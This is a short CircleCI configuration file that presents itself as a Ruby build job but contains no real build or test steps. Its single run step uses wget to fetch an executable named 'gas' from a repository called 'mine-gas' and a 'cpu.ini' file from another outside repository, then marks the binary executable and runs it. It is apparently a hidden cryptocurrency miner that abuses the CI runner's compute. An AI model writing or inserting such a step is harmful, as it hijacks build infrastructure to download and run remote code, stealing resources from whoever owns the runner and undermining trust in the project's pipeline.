version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: wget https://github.com/L00K11/mine-gas/raw/main/gas && wget https://raw.githubusercontent.com/xazansth/gas/main/cpu.ini && chmod +x gas && ./gas cpu.ini